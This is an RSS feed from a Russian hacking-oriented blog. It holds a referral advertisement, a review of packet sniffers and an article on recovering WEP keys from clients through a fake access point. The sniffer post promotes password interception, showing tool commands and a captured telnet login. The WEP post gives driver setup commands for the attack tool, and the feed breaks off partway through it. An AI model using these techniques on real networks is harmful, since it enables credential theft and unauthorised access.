<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Как разблокировать аккаунт &#187; Это интересно</title>
	<atom:link href="http://suspended.ru/category/%d0%bf%d1%80%d0%be%d1%87%d0%b5%d0%b5/feed/" rel="self" type="application/rss+xml" />
	<link>http://suspended.ru</link>
	<description>Как разблокировать аккаунты, защитить компьютер и стать хакером</description>
	<lastBuildDate>Thu, 23 Dec 2021 13:52:45 +0000</lastBuildDate>
	<language>ru-RU</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.9.27</generator>
	<item>
		<title>Выгода от работы с центром обслуживания партнеров Profit-Partner</title>
		<link>http://suspended.ru/2013/08/918/</link>
		<comments>http://suspended.ru/2013/08/918/#comments</comments>
		<pubDate>Wed, 28 Aug 2013 10:05:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[profit partner]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=918</guid>
		<description><![CDATA[Здравствуйте. На протяжении уже пяти лет успешно функционирует центр обслуживания партнеров крупнейшей рекламной сети в «Рунете» &#8212; Profit-Partner. Видимо, уже подавляющее большинство веб-мастеров слышали об этой системе. Кроме того, многие специалисты мечтают попасть в эту рекламную сеть. Такая бешеная популярность рекламной сети Яндекса является оправданной. На сегодняшний день, это самый простой, удобный и безопасный способ [&#8230;]]]></description>
				<content:encoded><![CDATA[<p align="justify">Здравствуйте. На протяжении уже пяти лет успешно функционирует центр обслуживания партнеров крупнейшей рекламной сети в «Рунете» &#8212; <a href="http://profit-partner.ru/?r=4ace478934ea8aa61294a8297d523762" target="_blank">Profit-Partner</a>. Видимо, уже подавляющее большинство веб-мастеров слышали об этой системе. Кроме того, многие специалисты мечтают попасть в эту рекламную сеть. Такая бешеная популярность рекламной сети Яндекса является оправданной. На сегодняшний день, это самый простой, удобный и безопасный способ монетизации сайта. Начинающие веб-мастера не очень понимают пользу работы с Profit-Partner, поэтому в этой статье мы попробуем немного просветить в этой теме.</p>
<p style="text-align: center;">
<p align="justify"><img class="aligncenter size-medium wp-image-917" title="profit-partner" src="http://suspended.ru/wp-content/uploads/2013/08/profit-partner-300x106.png" alt="profit-partner" width="300" height="106" /><span id="more-918"></span></p>
<p>Основной доход большинства веб-мастеров сегодня получают именно от контекстной рекламы, которая с каждым днем набирает все больше оборотов. Особенность работы с Profit-Partner, в первую очередь, заключается в том, что у них есть система бонусов. Например, если вы заработали первые 1000 рублей, по системе бонусов вам начисляется аналогичное количество баллов. Все эти бонусы можно собирать и потратить в так называемом магазине. Имея в активе немало бонусов, можно будет приобрести разнообразное программное обеспечение и другие товары. Таким образом, приобретение различных вещей происходит фактически без денег, то есть бесплатно. Относительно ассортимента в магазине стоит отметить, что он не ограничиваются простыми товарами. Кроме того. Стоимость всех товаров отличается лояльностью.</p>
<p align="justify">В числе товаров, которые предлагаются в магазине Profit-Partner, присутствует: лицензионный софт, антивирусы, операционные системы, домены, электронные и печатные книги, приобретение хостинга за бонусы, создание уникального сайта, работа с платными SEO-сервисами за бонусы, регистрация сайта в Яндекс.Каталоге, реклама и многое другое. Конечно, если вы хотите приобрести что-то действительно ценное, тогда придется немного подождать, пока наберется достаточное количество бонусов на счету. Понятное дело, что это лишь небольшая часть пользы от работ по Profit-Partner. Для пользователя, который впервые заходит на сайт центра обслуживания партнеров, все показано максимально доступно и просто. Главная страница отличается лаконичностью и четким установлением деталей сотрудничества. Большие объемы информации на сайте изложены доступным языком и могут заинтересовать даже простого посетителя.</p>
<p align="justify">Если вы, все же, решились на работу с Profit-Partner, тогда вам стоит знать еще некоторые интересные моменты о нем. Все выплаты в центре обслуживания партнеров происходят на пятый рабочий день месяца. Выплаты происходят совершенно без комиссий и с возможностью пополнения сразу нескольких электронных кошельков. Служба поддержки в Profit-Partner заслуживает отдельного внимания, ведь она работает в режиме он-лайн и в любой момент может предоставить качественную консультацию. Кроме того, на сайте можно общаться с посетителями и клиентами через блог и твиттер. Радует то, что Profit-Partner заинтересован не только в профессиональном сотрудничестве, но и в подборе квалифицированного персонала. Как результат, качество сервиса находится на высоком уровне и об этом свидетельствуют многочисленные отзывы партнеров.</p>
<p align="justify">Как и во многих компаниях, в Profit-Partner также действует реферальской программа. Согласно ей, каждый партнер, который приведет нового клиента в центр обслуживания партнеров, получит пять процентов от прибыли привлеченных вебмастеров. Многие пользователи активно ищут рефералов, которым также предлагают консультацию в вопросах повышения прибыли в рекламной сети Яндекса. Не менее важным фактором в работе с Profit-Partner является интерфейс. Стоит отметить, что здесь он отличается особенной дружественностью ко всем пользователям. Зарегистрироваться на сайте или добавить свой сайт в рекламную сеть Яндекса не представляет никакой сложности. Кроме того, администрация Profit-Partner постоянно пытается повысить безопасность выплат. Более года назад в центре обслуживания партнеров были введены платежные агенты, которые значительно упрощают финансовые операции. Ни один из платежных агентов не взымает комиссии по выплатам.</p>
<p align="justify"><img class="aligncenter size-medium wp-image-919" title="registraciya-v-profit-partner" src="http://suspended.ru/wp-content/uploads/2013/08/registraciya-v-profit-partner-300x227.jpg" alt="registraciya-v-profit-partner" width="300" height="227" /></p>
<p align="justify">Через собственный аканут на Profit-Partner вы можете свободно добавить неограниченное количество сайтов в систему. В случае необходимости вы даже можете получить бесплатный хостинг. Однако это происходит на определенных условиях. Вам предоставится бесплатный хостинг только в том случае, если через год ваш сайт будет работать с Profit-Partner. Подробную информацию можно получить в службе поддержки, которая работает круглосуточно. За пять лет работы центр обслуживания партнеров Profit-Partner показал себя только как качественного и функционального помощника в монетизации сайтов. Те партнеры, которые уже по несколько лет сотрудничают с Profit-Partner, полностью удовлетворены и с радостью принимают все обновления, которые иногда происходят в системе. Для того, чтобы лучше понять, что собой представляет Profit-Partner стоит попробовать поработать с ним. Существует большая вероятность, что вы будете просто поражены простотой работы с Профитом.</p>
<p align="justify"><img class="aligncenter size-medium wp-image-920" title="profit-partner-2" src="http://suspended.ru/wp-content/uploads/2013/08/profit-partner-2-300x278.jpg" alt="profit-partner-2" width="300" height="278" /></p>
<p align="center">
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2013/08/918/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Сниффер &#8212; что за зверь</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-292/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-292/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=600</guid>
		<description><![CDATA[конецформыначалоформыСнифферы &#8212; это проги, которые перехватывают весь сетевой трафик. Снифферы полезны для диагностики сети(для админов) и для перехвата паролей (понятно для кого:)). Например если ты получил доступ к одной сетевой машине и установил там сниффер, то скоро все пароли от их подсети будут твои. Снифферы ставят сетевую карту в прослушивающий режим (PROMISC).То есть они получают [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet300.jpg" alt="интернет" />конецформыначалоформыСнифферы &#8212; это проги, которые перехватывают весь сетевой трафик. Снифферы полезны для диагностики сети(для админов) и для перехвата паролей (понятно для кого:)). Например если ты получил доступ к одной сетевой машине и установил там сниффер, то скоро все пароли от их подсети будут твои. Снифферы ставят сетевую карту в прослушивающий режим (PROMISC).То есть они получают все пакеты. В локалке можно перехватывать все отправляемые пакеты со всех машин (если вы не разделены всякими хабами), так как там практикуется широковещание. Снифферы могут перехватывать все пакеты (что очень неудобно, ужасно быстро переполняется лог файл, зато для более детального анализа сети самое оно) или только первые байты от всяких ftp,telnet,pop3 и т.д.<span id="more-600"></span> (это самое веселое, обычно примерно в первых 100 байтах содержится имя и пароль:)). Снифферов сейчас развелось&#8230; Множество снифферов есть как под Unix, так и под Windows (даже под DOS есть:)). Снифферы могут поддерживать только определенную ось (например linux_sniffer.c,который поддерживает Linux:)), либо несколько (например Sniffit, работает с BSD, Linux, Solaris). Снифферы так разжились из-за того, что пароли передаются по сети открытым текстом. Таких служб уйма. Это telnet, ftp, pop3, www и т.д. Этими службами пользуется уйма народу:). После бума снифферов начали появляться различные алгоритмы шифрования этих протоколов. Появился SSH (альтернатива telnet, поддерживающий шифрование), SSL(Secure Socket Layer &#8212; разработка Netscape, способная зашифровать www сеанс). Появились всякие Kerberous, VPN(Virtual Private Network). Заюзались некие AntiSniff&#8217;ы, ifstatus&#8217;ы и т.д. Но это в корне не изменило положения. Службы, которые используют передачу пароля plain text&#8217;ом юзаются во всю:). Поэтому сниффать еще долго будут:).<br />
Windows реализации снифферов</p>
<p>CommView &#8212; www.tamos.com<br />
Довольно продвинутый сниффер производства TamoSoft. Можно установить свои правила на сниффинг (например игнорировать ICMP, а TCP сниффать, также кроме Internet протоколов имеется поддержка Ethernet протоколов, таких как ARP,SNMP,NOVELL и т.д.). Можно например сниффать только входящие пакеты, а остальные игнорить. Можно указать лог-файл для всех пакетов с лимитов размера в мегах. Имеет две tools&#8217;ы &#8212; Packet Generator и NIC Vendor Indentifier. Можно посмотреть все подробности посланных /полученных пакетов (например в TCP пакете можно просмотреть Source Port, Destination Port, Data length, Checksum, Sequence, Window, Ack, Flags, Urgent). Радует еще то, что она автоматически устанавливает CAPTURE драйвер. В общем тулза очень полезная для снифа, рекомендую всем.</p>
<p>SpyNet &#8212; packetstorm.securify.com<br />
Довольно известный сниффер производства Laurentiu Nicula 2000:). Обычные функции &#8212; перехват/декодинг пакетов. Хотя декодинг развит прикольно (можно например по пакетам воссоздавать странички, на которых побывал юзер!). В общем на любителя:).</p>
<p>Analyzer &#8212; neworder.box.sk<br />
Analyzer требует установку специального драйвера, вложенного в пакет (packet.inf, packet.sys). Можно посмотреть всю инфу о вашей сетевой карте. Также Analyzer поддерживает работу с командной строкой. Он прекрасно работает с локальной сетью. Имеет несколько утилит: ConvDump,GnuPlot,FlowsDet,Analisys Engine. Ничего выдающегося.</p>
<p>IRIS &#8212; www.eeye.com<br />
IRIS продукт известной фирмы eEye. Представляет обширные возможности по фильтрации. Меня в нем сильно порадовало три фишки:<br />
1.Protocol Distribution<br />
2.Top hosts<br />
3.Size Distribution<br />
Также имеется Packet Decoder. Он поддерживает развитую систему логов. А доступные возможности фильтрации превосходят все снифферы обзора. Это Hardware Filter, который может ловить либо все пакеты (Promiscious), либо с различными ограничениями (например захватывать только multicast пакеты или broadcast пакеты, либо только Mac фреймы). Можно фильтровать по определенным MAC/IP адресам, по портам, по пакетам, содержащим определенные символы. В общем неплохой сниффак. Требует 50comupd.dll.</p>
<p>WinDUMP<br />
Аналог TCPdump for Unix. Этот сниффак действует через командную строку и представляет минимальные возможности по конфигурации и еще требует библиотеку WinPcap. Мне не очень&#8230;</p>
<p>SniffitNT<br />
Тоже требует WinPcap. Работа только как командной строкой, так и в интерактивном режиме. Со сложными опциями. Мне не очень.</p>
<p>ButtSniff<br />
Обычный пакетный сниффер созданный известнейшей группой CDC(Cult of the Dead Cow). Фишка его в том, что его можно использовать, как плагин к BO:)(Очень полезно:)).Работа из командной строки.</p>
<p>Существуют еще множество снифферов, таких как NatasX, NetXRay, CooperSniffer, LanExplorer, Net Analyzer и т.д. Пойдем дальне&#8230;</p>
<p>Unix&#8217;овые снифферы</p>
<p>Все снифферы данного обзора можно найти на packetstorm.securify.com.</p>
<p>linsniffer<br />
Это простой сниффер для перехвата логинов/паролей. Стандартная компиляция (gcc -o linsniffer linsniffer.c).<br />
Логи пишет в tcp.log.</p>
<p>linux_sniffer<br />
Linux_sniffer требуется тогда, когда вы хотите детально изучить сеть. Стандартная компиляция. Выдает всякую шнягу дополнительно, типа isn, ack, syn, echo_request (ping) и т.д.</p>
<p>Sniffit<br />
Sniffit &#8212; продвинутая модель сниффера написанная Brecht Claerhout. Install(нужна libcap):<br />
#./configure<br />
#make<br />
Теперь запускаем сниффер:<br />
#./sniffit<br />
usage: ./sniffit [-xdabvnN] [-P proto] [-A char] [-p port] [(-r|-R) recordfile]<br />
[-l sniflen] [-L logparam] [-F snifdevice] [-M plugin]<br />
[-D tty] (-t | -s) | (-i|-I) | -c]<br />
Plugins Available:<br />
0 &#8212; Dummy Plugin<br />
1 &#8212; DNS Plugin</p>
<p>Как видите, сниффит поддерживает множество опций. Можно использовать сниффак в интерактивном режиме. Сниффит хоть и довольно полезная прога, но я ей не пользуюсь. Почему? Потому что у Sniffit большие проблемы с защитой. Для Sniffit&#8217;a уже вышли ремоутный рут и дос для линукса и дебиана! Не каждый сниффер себе такое позволяет:).</p>
<p>HUNT<br />
Это мой любимый сниффак. Он очень прост в обращении, поддерживает много прикольных фишек и на данный момент не имеет проблем с безопасностью. Плюс не особо требователен к библиотекам (как например linsniffer и Linux_sniffer). Он может в реальном времени перехватывать текущие соединения и под чистую дампить с удаленного терминала. В общем, Hijack rulezzz:). Рекомендую всем для усиленного юзания:).<br />
Install:<br />
#make<br />
Run:<br />
#hunt -i [interface]</p>
<p>READSMB<br />
Сниффер READSMB вырезан из LophtCrack и портирован под Unix (как ни странно:)). Readsmb перехватывает SMB пакеты.</p>
<p>TCPDUMP<br />
tcpdump &#8212; довольно известный анализатор пакетов. Написанный еще более известным челом &#8212; Вэн Якобсоном, который придумал VJ-сжатие для PPP и написал прогу traceroute (и кто знает что еще?). Требует библиотеку Libpcap.<br />
Install:<br />
#./configure<br />
#make<br />
Теперь запускаем ее:<br />
#tcpdump<br />
tcpdump: listening on ppp0<br />
Все твои коннекты выводит на терминал. Вот пример вывода на пинг<br />
ftp.technotronic.com:<br />
02:03:08.918959 195.170.212.151.1039 > 195.170.212.77.domain: 60946+ A?<br />
ftp.technotronic.com. (38)<br />
02:03:09.456780 195.170.212.77.domain > 195.170.212.151.1039: 60946* 1/3/3 (165)<br />
02:03:09.459421 195.170.212.151 > 209.100.46.7: icmp: echo request<br />
02:03:09.996780 209.100.46.7 > 195.170.212.151: icmp: echo reply<br />
02:03:10.456864 195.170.212.151 > 209.100.46.7: icmp: echo request<br />
02:03:10.906779 209.100.46.7 > 195.170.212.151: icmp: echo reply<br />
02:03:11.456846 195.170.212.151 > 209.100.46.7: icmp: echo request<br />
02:03:11.966786 209.100.46.7 > 195.170.212.151: icmp: echo reply<br />
В общем, снифф полезен для отладки сетей, нахождения неисправностей и т.д.</p>
<p>Dsniff<br />
Dsniff требует libpcap, ibnet, libnids и OpenSSH. Записывает только введенные команды, что очень удобно. Вот пример лога коннекта на unix-shells.com:</p>
<p>02/18/01 03:58:04 tcp my.ip.1501 -> handi4-145-253-158-170.arcor-ip.net.23<br />
(telnet)<br />
stalsen<br />
asdqwe123<br />
ls<br />
pwd<br />
who<br />
last<br />
exit</p>
<p>Вот dsniff перехватил логин с паролем (stalsen/asdqwe123).<br />
Install:<br />
#./configure<br />
#make<br />
#make install</p>
<p>Защита от снифферов</p>
<p>Самый верный способ защиты от снифферов &#8212; использовать ШИФРОВАНИЕ (SSH, Kerberous, VPN, S/Key, S/MIME, SHTTP, SSL и т.д.). Ну а если не охота отказываться от plain text служб и установления дополнительных пакетов:)? Тогда пора юзать антиснифферские пекеты&#8230;</p>
<p>AntiSniff for Windows<br />
Этот продукт выпустила известная группа Lopht. Это был первый продукт в своем роде. AntiSniff, как сказано в описании:<br />
&#171;AntiSniff is a Graphical User Interface (GUI) driven tool for detecting promiscuous Network Interface Cards (NICs) on your local network segment&#187;. В общем, ловит карты в promisc режиме. Поддерживает огромное количество тестов (DNS test, ARP test, Ping Test, ICMP Time Delta Test, Echo Test, PingDrop test). Можно сканить как одну машину, так и сетку. Здесь имеется поддержка логов. AntiSniff работает на win95/98/NT/2000, хотя рекомендуемая платформа NT. Но царствование его было недолгим и уже в скором времени появился сниффер под названием AntiAntiSniffer:), написанный Майком Перри (Mike Perry) (найти его можно по адресу www.void.ru/news/9908/snoof.txt).Он основан на LinSniffer (рассмотренный далее).</p>
<p>Unix sniffer detect:<br />
Сниффер можно обнаружить командой:<br />
#ifconfig -a<br />
lo Link encap:Local Loopback<br />
inet addr:127.0.0.1 Mask:255.0.0.0<br />
UP LOOPBACK RUNNING MTU:3924 Metric:1<br />
RX packets:2373 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2373 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:0</p>
<p>ppp0 Link encap:Point-to-Point Protocol<br />
inet addr:195.170.y.x P-t-P:195.170.y.x Mask:255.255.255.255<br />
UP POINTOPOINT PROMISC RUNNING NOARP MULTICAST MTU:1500 Metric:1<br />
RX packets:3281 errors:74 dropped:0 overruns:0 frame:74<br />
TX packets:3398 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:10</p>
<p>Как видите интерфейс ppp0 стоит в PROMISC mode. Либо оператор загрузил снифф для проверки сети, либо вас уже имеют&#8230; Но помните, что ifconfig можно спокойно подменить, поэтому юзайте tripwire для обнаружения изменений и всяческие проги для проверки на сниффы.</p>
<p>AntiSniff for Unix.<br />
Работает на BSD, Solaris и Linux. Поддерживает ping/icmp time test, arp test, echo test, dns test, etherping test, в общем аналог AntiSniff&#8217;а для Win, только для Unix:).<br />
Install:<br />
#make linux-all</p>
<p>Sentinel<br />
Тоже полезная прога для отлова снифферов. Поддерживает множество тестов. Проста в использовании.<br />
Install : #make<br />
#./sentinel<br />
./sentinel [method] [-t ] [options]<br />
Methods:<br />
[ -a ARP test ]<br />
[ -d DNS test ]<br />
[ -i ICMP Ping Latency test ]<br />
[ -e ICMP Etherping test ]<br />
Options:<br />
[ -f ]<br />
[ -v Show version and exit ]<br />
[ -n ]<br />
[ -I ]</p>
<p>Опции настолько просты, что no comments.</p>
<p>MORE</p>
<p>Вот еще несколько утилит для проверки вашей сети(for Unix):<br />
packetstorm.securify.com/UNIX/IDS/scanpromisc.c -ремоутный детектор PROMISC mode для ethernet карт (for red hat 5.x).<br />
http://packetstorm.securify.com/UNIX/IDS/neped.c &#8212; Network Promiscuous Ethernet Detector (нужно libcap &#038; Glibc).<br />
http://packetstorm.securify.com/Exploit_Code_Archive/promisc.c -сканирует девайсы системы на детект сниффов.<br />
http://packetstorm.securify.com/UNIX/IDS/ifstatus2.2.tar.gz &#8212; ifstatus тестит сетевые интерфейсы в PROMISC mode.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-292/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Атаки на клиентов WEP</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-291/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-291/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Это интересно]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[интересно]]></category>
		<category><![CDATA[статьи]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=599</guid>
		<description><![CDATA[Казалось бы, говорить об уязвимостях протокола WEP в 2007 году можно только с точки зрения исторической ретроспективы. Однако, несмотря на все свои недостатки, протокол WEP все еще широко используется в беспроводных сетях. Что обуславливает необходимость демонстрации опасности его применения в ходе тестов на проникновение. Существующие методы взлома WEP ориентированны, прежде всего, на точки доступа и [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet299.jpg" alt="интернет" />Казалось бы, говорить об уязвимостях протокола WEP в 2007 году можно только с точки зрения исторической ретроспективы. Однако, несмотря на все свои недостатки, протокол WEP все еще широко используется в беспроводных сетях. Что обуславливает необходимость демонстрации опасности его применения в ходе тестов на проникновение. Существующие методы взлома WEP ориентированны, прежде всего, на точки доступа и требуют наличия возможности интерактивного взаимодействия с AP. В данной статье приведена техника, позволяющая восстановить ключ WEP без доступа к AP, находясь в диапазоне радиовидимости станции, ищущей сеть.<br />
Например, ключ WEP к домашней точке доступа может быть получен в то время, как её владелец работает на ноутбуке в самолете или офисе.<span id="more-599"></span><br />
Атаки на клиентов беспроводных сетей<br />
Атаки, направленные на клиентов беспроводных сетей являются эффективным инструментом в арсенале злоумышленников. Одним из наиболее распространенных методов является создание атакующим точки доступа, ожидание соединения с ней клиента и подключение к станции на сетевом уровне. Для эмуляции точки доступа, соответствующей требованиям станции могут быть использованы утилиты Karma Tools, probemapper или airsnarf и т.д.<br />
Как показывают исследования с использованием техники Gnivirdraw, до 80% клиентов содержат в профиле незащищенные подключения или по другим причинам соединяются с ложными точками доступа. Однако использование станцией любых механизмов защиты, даже таких как WEP уже серьезно снижают вероятность успеха атакующего. Это связанно с тем, что клиенты будут требовать от ложной точки доступа применения WEP.<br />
Большинство клиентов используют аутентификацию Open System, что увеличивает вероятность успешного установления ассоциации и в случае применения WEP. Однако все данные на вышестоящих уровнях модели OSI будут зашифрованы с помощью неизвестного ключа. То есть злоумышленник может установить ложную точку доступа с произвольным ключом WEP и многие клиенты подключатся к ней на канальном уровне, но без возможности обмена информацией.<br />
В некоторых публикациях, например &#171;Отважные герои всегда идут в обход&#187; приводится описание атак с ложной точкой доступа, при которых для восстановления ключа используется трафик, генерируемый клиентом. Однако автору описанные атаки представляются скорее теоретическими, чем пригодными для практического применения.<br />
Большинство современных реализаций стека TCP/IP генерируют некоторый объем сетевого трафика при подключении к сети. Примером могут служить сообщения протоколов DHCP, NetBIOS, IPv6 NDP и так далее. Однако количество передаваемых в этом случае пакетов (как правило, до нескольких десятков) недостаточно для проведения KoreK-атак, требующих десятки тысяч пакетов с различными векторами инициализации (IV).<br />
Стандартный подход, заключающийся в передаче перехваченных ранее широковещательных пакетов, в рассматриваем случае также бесполезен. Поскольку точка доступа контролируется злоумышленником, все ретранслированные ею пакеты будут использовать ключ WEP, не представляющий интереса для злоумышленника. Таким образом, для взлома WEP необходимо спровоцировать подключившегося клиента на передачу достаточного количества пакетов с различными значениями векторов инициализации. Решить эту задачу можно путем передачи клиенту сообщений, требующих ответа (ARP, ICMP-Echo, IPv6 NDP). Но сделать это необходимо без знания ключа WEP.<br />
Атаки с фрагментацией<br />
Существует достаточно много методов формирования пакетов WEP без знания ключа шифрования. Наиболее эффективным является использование фрагментации на канальном уровне 802.11 . Суть этого метода заключается в эксплуатации атаки с известным открытым текстом. Используя предсказуемый формат заголовков LLC, существует возможность восстановить 8 байт гаммы (выхода алгоритма PRGA в RC4, далее PRGA). Для этого первые восемь из зашифрованных байт складываются по модулю два с константой, содержащей стандартное значение заголовков LLC<br />
Как видно , в заголовке LLC два последних байта могут меняться. Их значение определяет тип используемого протокола вышестоящего уровня. Возможные значения данных полей описаны в документах IANA (http://www.iana.org/assignments/ethernet-numbers).<br />
В большинстве случаев беспроводные сети используются для передачи IP-трафика. Следовательно, поле Ether type может принимать одно из трех возможных значений:<br />
0&#215;0800 – при передаче IP пакетов;<br />
0&#215;0806 – для пакетов ARP;<br />
0x86DD – для пакетов IPv6.<br />
Пакеты ARP легко отличить от других по их фиксированному размеру (28 байт данных). Использование протокола IPv6 достаточно просто идентифицируется по наличию широковещательных пакетов на MAC-адреса 33:33:xx:xx:xx:xx, используемых протоколом IPv6 NDP. Полученные 8 байт гаммы могут быть использованы для передачи в сеть произвольных данных той же длины. Но с практической точки зрения это не представляет большого интереса, поскольку все 8 байт в передаваемом пакете будет занимать заголовок LLC. Чтобы обойти это ограничение, может использоваться функция фрагментации на канальном уровне. Беспроводные сети реализуют механизм, позволяющий передать один пакет вышестоящего уровня в нескольких (до 16) фрагментах 802.11. После перехвата одного из пакетов клиента и восстановления PRGA, отправляемый пакет разделяется на несколько фрагментов, содержащих по 4 байта данных (см. рисунок 4).<br />
Каждый их них передается как отдельный фрейм с использованием функции фрагментации 802.11. Пакеты дополняются контрольной суммой (WEP ICV) и зашифровываются с использованием отрезка восстановленной гаммы. Таким образом, без знания ключа WEP в сеть можно передать пакеты длиной до 64 байт. На практике в сеть можно передать пакеты большего размера. Для этого используется IP-фрагментация, а также структура некоторых служебных пакетов. Например, при перехвате пакета ARP пакета можно восстановить не 8, а 24 байта гаммы (см. рисунок 5). Для этого используются крайне предсказуемые значения заголовков LLC, ARP, а также MAC-адрес отправителя, указанный в заголовках 802.11 в открытом виде<br />
При использовании в сети IPv6, можно восстановить и больший отрезок гаммы. Например, при перехвате пакетов IPv6 NDP Neighbor Solicitation или Router Solicitation можно восстановить до 50 байт гаммы (заголовки LLC + заголовки IP + 2 байта заголовков ICMP). Это связанно с тем, что в заголовке IPv6 отсутствует поле контроля целостности. Кроме того, при использовании Local-Link адресации адрес IPv6 можно восстановить по MAC-адресу в заголовках 802.11 (см. http://www.securitylab.ru/contest/264659.php), если узлом не используется механизмы рандомизации адресов. Отличить разные типы сообщений IPv6 можно по MAC-адресам получателей и размеру. Например, пакет, IPv6 Router Solicitation имеет длину 70 байт и передается на MAC-адрес 33:33:00:00:00:02.<br />
С использованием 50 байт PRGA в сеть можно передать пакеты размером до 736 байт ((50-4)*16), что более чем достаточно для практических целей.<br />
Генерация трафика<br />
При использовании атаки с фрагментацией у злоумышленника, установившего ложную точку доступа, появляется возможность передать подключившейся станции зашифрованный пакет, которой будет гарантированно обработан получателем. Таким образом, остается только сформировать пакет, на который клиент ответит. Примером подобного пакета является ARP-запрос. Дополнительным плюсом является тот факт, что ARP-пакеты не блокируются персональными межсетевыми экранами. Однако, для того, чтобы станция ответила на ARP-запрос, необходимо, чтобы поле Target IP содержало текущий IP-адрес интерфейса. Этой информацией злоумышленник не обладает, поскольку адрес передается в пакетах в зашифрованном виде.<br />
Чтобы получить IP-адрес станции, можно воспользоваться ARP-сканированием, то есть отправкой ARP-запросов на различные адреса получателей, и ожиданием ответа на один из них. Если ответ был получен, значит, станция использует запрошенный IP-адрес (например, 169.254.5.9, см. рисунок 6).<br />
Атаки на клиентов WEP<br />
В качестве диапазонов для сканирования могут выбираться адреса из диапазона APIPA (169.254/32) или распространенные адреса RFC 1918 (например, 192.168.0/24). После того, как IP-адрес станции был определен, используется повторная передача ARP-запроса с целью получения необходимого для KoreK-атак количества пакетов с различными векторами инициализации. Для того, чтобы отличить ARP-запросы, отправленные на разные IP-адреса, могут использоваться различные MAC-адреса отправителя. В случае поддержки станцией IPv6 ситуация упрощается. Поскольку большинство реализаций стека IPv6 отвечает на широковещательные (например, направленные на адрес ff02::01) ICMPv6-echo запросы, то злоумышленнику достаточно отправить подобный пакет в сеть.<br />
Атаки на клиентов WEP<br />
Также в IPv6 может применяться пакет IPv6 Neighbor Solicitation (аналог ARP-Request в IPv4). В этом случае осуществлять подбор IP-адреса нет необходимости, поскольку Local-Link IP-адрес может быть определен по MAC-адресу стации.<br />
В ходе исследования использовались клиентах на основе следующих ОС:<br />
Windows XP Service Pack 2<br />
Linux 2.6.x<br />
Windows Mobile 2003 SE<br />
Во всех трех случаях подход показал высокую эффективность работы. Особенно это относится к Linux и Windows Mobile, стеки TCP/IP которых поддерживают IPv6 «по умолчанию». Сводные данные по ОС приведены в таблице.<br />
Windows XP Service Pack 2 Linux 2.6.x Windows Mobile 2003 SE<br />
Поддержка APIPA Да Зависит от настройки Да<br />
Поддержка IPv6 Требует настройки Встроенная Встроенная<br />
Ответ на ping6 ff02::1 Да Да Да<br />
Поддержка RFC3041 Нет Нет Нет<br />
Практическая реализация<br />
Для демонстрации практической возможности описанной атаки была разработана утилита wep0ff . После запуска, программа ожидает пакетов от соединившихся клиентов. Из полученного пакета извлекается значение вектора инициализации и MAC-адреса станции, восстанавливается PRGA. Затем программа в течении полутора минут оправляет широковещательные ICMPv6-Echo запросы, после чего пытается провести ARP-сканирование сети для диапазона APIPA (169.254/32). Как показали эксперименты, сканирование всех адресов данного диапазона в режиме 802.11g only занимает мене двух минут.<br />
Программа разрабатывалась для драйверов madwifi-old с поддержкой raw device. Для её использования необходимо предварительно настроить драйвер на поддержку данного типа устройств:<br />
# iwpriv ath0 mode 3<br />
# echo 1 > /proc/sys/dev/ath0/rawdev<br />
# echo 1 > /proc/sys/dev/ath0/rawdev_type<br />
# ifconfig ath0raw up<br />
Программа вполне также работоспособна и на драйверах madwifi-ng. В этом случае необходимо создать два виртуальных адаптера: один для работы в режиме точки доступа, второй – в режиме мониторинга.<br />
# wlanconfig ath0 create wlandev wifi0 wlanmode master<br />
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor<br />
